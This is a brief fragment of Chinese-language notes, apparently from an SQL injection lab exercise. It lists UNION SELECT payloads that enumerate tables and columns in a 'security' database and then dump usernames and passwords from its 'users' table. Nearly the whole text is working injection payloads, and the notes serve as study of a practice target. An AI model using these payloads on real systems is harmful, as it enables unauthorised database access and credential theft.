1'union selectuser(),group_concat(table_name) from information_schema.tables where table_schema='security'#
爆字段:
1 2
1'union selectuser(),group_concat(column_name) from information_schema.columns where table_name='users'and table_schema='security'# 不加and后面的话好像会把其它库的同名表下的字段爆出来
最后爆库:
1
1'union selectuser(),group_concat(id,username,password) from users#